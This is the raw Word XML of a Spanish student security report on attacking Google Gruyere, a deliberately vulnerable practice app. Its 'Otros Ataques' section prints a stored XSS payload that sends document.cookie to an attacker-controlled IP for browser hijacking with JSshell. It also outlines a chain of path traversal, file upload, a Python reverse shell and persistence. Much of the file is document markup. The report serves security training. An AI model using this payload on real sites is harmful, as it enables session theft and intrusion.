    <w:p w14:paraId="4C74D158" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRPr="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00821D5D">
        <w:t>Para protegerse contra esta vulnerabilidad, es importante utilizar el método POST en lugar de GET para enviar datos de formulario confidenciales. El método POST oculta los datos del formulario en el cuerpo de la solicitud HTTP en lugar de incluirlos en la URL, lo que hace que sea más difícil para un atacante interceptar o manipular los datos del formulario. También es importante asegurarse de que los sitios web que contienen formularios sensibles estén protegidos por SSL/TLS para proporcionar una conexión encriptada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B7D31" w14:textId="77777777" w:rsidR="00725D71" w:rsidRPr="00821D5D" w:rsidRDefault="00725D71" w:rsidP="00821D5D"/>
    <w:p w14:paraId="1CACA88B" w14:textId="26CA8F60" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EB162A" w14:textId="2CBE1D41" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147511D8" w14:textId="77777777" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EF11B6" w14:textId="7E87563E" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290494A4" w14:textId="2FC724D5" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DCBD46" w14:textId="0055DB42" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A66A96" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409DB5F5" w14:textId="7D5A46AD" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B56506A" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35508AC3" w14:textId="6DE825FE" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E2A2A8" w14:textId="3886DBED" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00CB5348"/>
    <w:p w14:paraId="28AFE539" w14:textId="47A817F4" w:rsidR="00CB5348" w:rsidRPr="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00CB5348">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC84DB6" w14:textId="3B5A1B81" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00CB5348"/>
    <w:p w14:paraId="0ADDFC48" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRPr="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00CB5348">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561B02ED" w14:textId="5588245B" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00821D5D"/>
    <w:p w14:paraId="34F9CFF2" w14:textId="0A1AF137" w:rsidR="00347913" w:rsidRDefault="00F5671C" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc128034204"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Otros Ataques:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="68CCDA43" w14:textId="15DE325B" w:rsidR="00F5671C" w:rsidRDefault="00F5671C" w:rsidP="00F5671C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083E83C3" w14:textId="3AA83EDB" w:rsidR="00F5671C" w:rsidRDefault="00F5671C" w:rsidP="00F5671C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En este caso demuestro como conseguir al acceso a la maquina a donde Google Gruyere </w:t>
      </w:r>
      <w:r w:rsidR="00F00B53">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instalada, y como pasar de un XSS a controlar el navegador del cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688AADE" w14:textId="0AA06D7A" w:rsidR="00F5671C" w:rsidRDefault="00F5671C" w:rsidP="00F5671C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todo esto se pude ver en la sección de pruebas de concepto Reverse Shell y XSS to RCE, respectivamente. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A9B01" w14:textId="5A266262" w:rsidR="00956833" w:rsidRDefault="00F5671C" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Demuestro muchas técnicas para conseguir tanto el control del sistema, como para controlar el navegador, explotando las vulnerabilidades de Google Gruyere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9933B4" w14:textId="49613BA9" w:rsidR="00B218F1" w:rsidRDefault="00B218F1" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323A8FDF" w14:textId="601B235F" w:rsidR="00B218F1" w:rsidRDefault="00B218F1" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Pasaré a explicarlas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28DE37" w14:textId="16E18A46" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65824BEF" w14:textId="247C9960" w:rsidR="00F8727B" w:rsidRDefault="00F8727B">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS to RCE -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14C486" w14:textId="77777777" w:rsidR="00C80EBA" w:rsidRPr="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00C80EBA"/>
    <w:p w14:paraId="7565F58F" w14:textId="062EB547" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso mediante el uso de XSS almacenado en la parte de los fragmentos de la aplicación web, consigo usando esta paiload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED205C" w14:textId="2AB77559" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8727B">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.1.148:500/?".concat(document.cookie)},1010)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D8F3A" w14:textId="742777D1" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>En conjunto con el programa JSshell, crear una Shell que controle el navegador del cliente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C724E" w14:textId="2E103F40" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7585">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482A83CC" wp14:editId="26CD96F2">
            <wp:extent cx="5190066" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="388" name="Imagen 38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n 270" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191765" cy="2903535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="405755E3" w14:textId="6B533D3C" w:rsidR="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>En la documentación del ataque muestro otra forma de conseguir la explotación de esta vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1ABF6" w14:textId="77777777" w:rsidR="00F8727B" w:rsidRDefault="00F8727B" w:rsidP="00F8727B">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352CC3F4" w14:textId="10001E89" w:rsidR="00F8727B" w:rsidRDefault="00C80EBA">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EA48D" w14:textId="6FA02B95" w:rsidR="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB4EDB6" w14:textId="5E2A92B6" w:rsidR="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Una ‘reverse shell’ y una ‘bind shell’ son técnicas comúnmente utilizadas en ataques informáticos para permitir que un atacante obtenga acceso remoto a un sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F89F9" w14:textId="57A1821B" w:rsidR="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una ‘reverse shell’ es una conexión de red que se establece desde el sistema comprometido hacia al atacante. El atacante iniciar la conexión abriendo un puerto en su </w:t>
      </w:r>
      <w:r w:rsidR="009D6311">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y escuchando en </w:t>
      </w:r>
      <w:r w:rsidR="009D6311">
        <w:t>él</w:t>
      </w:r>
      <w:r>
        <w:t>. Lu</w:t>
      </w:r>
      <w:r w:rsidR="009D6311">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>go</w:t>
      </w:r>
      <w:r w:rsidR="009D6311">
        <w:t xml:space="preserve"> en el sistema comprometido se ejecutará un código malicioso que se conecta al puerto de el atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADC105" w14:textId="0E98ECC9" w:rsidR="00C80EBA" w:rsidRDefault="00C80EBA" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:t>Una ‘bind shell’ es una conexión de red establecida desde el sistema atacado hacia el atacante</w:t>
      </w:r>
      <w:r w:rsidR="009D6311">
        <w:t>. En este caso, el atacante ejecuta un código malicioso en el sistema comprometido que abre un puerto de escucha en él. Cuando el atacante desea obtener acceso remoto, inicia una conexión desde sus sistema hacia el puerto abierto en el sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC083C8" w14:textId="497811A6" w:rsidR="00751EA6" w:rsidRDefault="00751EA6" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:t>Para ejecutar explotar esta vulnerabilidad tendré que usar Path transversal para crear un usuario que tenga de nombre ‘..’, para que su carpeta pase a ser la raíz, después usaré File Upload para subir la Shell reversa escrita en Python, y por ultimo modificar un archivo del propio servidor para que ejecute esa Shell y así obtener el control remoto, y por último ganar persistencia, es decir ganar el acceso indefinido a la máquina vulnerada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB7115" w14:textId="77777777" w:rsidR="00D81A1F" w:rsidRDefault="00D81A1F" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495BB002" w14:textId="003960CE" w:rsidR="00C80EBA" w:rsidRDefault="00751EA6" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="615B1BAF" wp14:editId="015A4C9A">
            <wp:extent cx="5345853" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:docPr id="391" name="Imagen 39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descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5347117" cy="5806543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34435C6F" w14:textId="173DEA00" w:rsidR="00D81A1F" w:rsidRDefault="00D81A1F" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D46BDA5" w14:textId="64174575" w:rsidR="00D81A1F" w:rsidRPr="00C80EBA" w:rsidRDefault="00D81A1F" w:rsidP="00C80EBA">
      <w:pPr>
        <w:ind w:left="1770"/>
      </w:pPr>
      <w:r>
        <w:t>Para defenderse de esta ataque ver las partes correspondientes ya explicadas en este informe sobre cada vulnerabilidad usada en este ataque.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D81A1F" w:rsidRPr="00C80EBA" w:rsidSect="00352926">
      <w:headerReference w:type="default" r:id="rId356"/>
      <w:footerReference w:type="default" r:id="rId35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26A8" w14:textId="77777777" w:rsidR="006F558E" w:rsidRDefault="006F558E" w:rsidP="00352926">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="034298B0" w14:textId="77777777" w:rsidR="006F558E" w:rsidRDefault="006F558E" w:rsidP="0035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9452" w14:textId="2D27273A" w:rsidR="00352926" w:rsidRDefault="00352926">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64B3C894" w14:textId="09400D58" w:rsidR="00352926" w:rsidRDefault="00352926">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
      </w:rPr>
      <w:t>Alesander Martínez Sei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4EA1" w14:textId="77777777" w:rsidR="006F558E" w:rsidRDefault="006F558E" w:rsidP="00352926">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03D57123" w14:textId="77777777" w:rsidR="006F558E" w:rsidRDefault="006F558E" w:rsidP="00352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DC20" w14:textId="3BADB5B8" w:rsidR="00352926" w:rsidRDefault="00352926">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="118745" distR="118745" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="12211C27" wp14:editId="1B41C28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41F3925" w14:textId="4BFA3380" w:rsidR="00352926" w:rsidRDefault="0059473E">
                              <w:pPr>
                                <w:pStyle w:val="Encabezado"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:t>Proyecto 1ª evaluació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211C27" id="Rectángulo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41F3925" w14:textId="4BFA3380" w:rsidR="00352926" w:rsidRDefault="0059473E">
                        <w:pPr>
                          <w:pStyle w:val="Encabezado"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:caps/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:caps/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          </w:rPr>
                          <w:t>Proyecto 1ª evaluació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5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8CA489E"/>
    <w:name w:val="WW8Num12"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>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AB61815"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4063662"/>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B2C4E7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD56B224"/>
    <w:lvl w:ilvl="0" w:tplc="D4A0766E">
      <w:start w:val="1"/>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F7A7E24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07B650FC"/>
    <w:lvl w:ilvl="0" w:tplc="31CCD96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5D3ED9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07B650FC"/>
    <w:lvl w:ilvl="0" w:tplc="31CCD96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4F7C92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11E259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673F4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C80A3A8"/>
    <w:lvl w:ilvl="0" w:tplc="FCD298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D52135"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F5E8662"/>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031774A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FFEB39C"/>
    <w:lvl w:ilvl="0" w:tplc="5932356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35D56A8B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99BEB528"/>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602213A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2332A636"/>
    <w:lvl w:ilvl="0" w:tplc="FB0E127A">
      <w:start w:val="1"/>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A242B4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13BA153A"/>
    <w:lvl w:ilvl="0" w:tplc="A1942126">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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3FE161B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF5AB4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4E0061"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42A4DDFA"/>
    <w:lvl w:ilvl="0" w:tplc="56AEB654">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1428" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBidi"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4B16ED5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD4A3E54"/>
    <w:lvl w:ilvl="0" w:tplc="AEA46F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D866FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F36C7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E10DA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FD23EB2"/>
    <w:lvl w:ilvl="0" w:tplc="9E54736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E03F05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDE05606"/>
    <w:lvl w:ilvl="0" w:tplc="EA765B8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B9A14A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4AEA602"/>
    <w:lvl w:ilvl="0" w:tplc="FE1C0DB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0AB7229"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F996BC3A"/>
    <w:lvl w:ilvl="0" w:tplc="399C7A7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0A6402"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F43C4066"/>
    <w:lvl w:ilvl="0" w:tplc="D910C24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822618"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE706A44"/>
    <w:lvl w:ilvl="0" w:tplc="3D7E5614">
      <w:start w:val="2"/>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7932F4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FAC7198"/>
    <w:lvl w:ilvl="0" w:tplc="5204EAA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="2F5496"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0121B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A58DF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B56FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5324F9C2"/>
    <w:lvl w:ilvl="0" w:tplc="D1B45D3C">
      <w:start w:val="1"/>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460078947">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1576163439">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1207522166">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1854302352">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1072502932">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2031179657">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="223412225">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="332416054">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1278751645">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="208298207">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="735518024">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1681347608">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1046491494">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="409157789">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1714307448">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="198855260">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="796264140">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1473401813">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1577589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8005462">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="181827319">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1559437941">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="581764880">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1410925641">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="261568232">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="104445241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03"/>
    <w:rsid w:val="0000079E"/>
    <w:rsid w:val="00006234"/>
    <w:rsid w:val="00011C8D"/>
    <w:rsid w:val="00013B03"/>
    <w:rsid w:val="00023E0C"/>
    <w:rsid w:val="000260CB"/>
    <w:rsid w:val="000332FB"/>
    <w:rsid w:val="00034B11"/>
    <w:rsid w:val="00037110"/>
    <w:rsid w:val="00043525"/>
    <w:rsid w:val="000472A2"/>
    <w:rsid w:val="00052D2F"/>
    <w:rsid w:val="00064E32"/>
    <w:rsid w:val="000714B5"/>
    <w:rsid w:val="0007255E"/>
    <w:rsid w:val="000739B1"/>
    <w:rsid w:val="00084B9B"/>
    <w:rsid w:val="00087294"/>
    <w:rsid w:val="000933A5"/>
    <w:rsid w:val="000B4DFF"/>
    <w:rsid w:val="000B7124"/>
    <w:rsid w:val="000B727F"/>
    <w:rsid w:val="000B7BE6"/>
    <w:rsid w:val="000C1609"/>
    <w:rsid w:val="000C3124"/>
    <w:rsid w:val="000D2024"/>
    <w:rsid w:val="000D2BB8"/>
    <w:rsid w:val="000D34A5"/>
    <w:rsid w:val="000E194E"/>
    <w:rsid w:val="000E34DB"/>
    <w:rsid w:val="000F041D"/>
    <w:rsid w:val="000F2F7E"/>
    <w:rsid w:val="000F529E"/>
    <w:rsid w:val="000F5FC2"/>
    <w:rsid w:val="00101718"/>
    <w:rsid w:val="001101FA"/>
    <w:rsid w:val="0011413D"/>
    <w:rsid w:val="0012550A"/>
    <w:rsid w:val="00125DBA"/>
    <w:rsid w:val="001269E5"/>
    <w:rsid w:val="001320AC"/>
    <w:rsid w:val="00132129"/>
    <w:rsid w:val="00133957"/>
    <w:rsid w:val="00135FCB"/>
    <w:rsid w:val="00143A9A"/>
    <w:rsid w:val="0014730C"/>
    <w:rsid w:val="00157313"/>
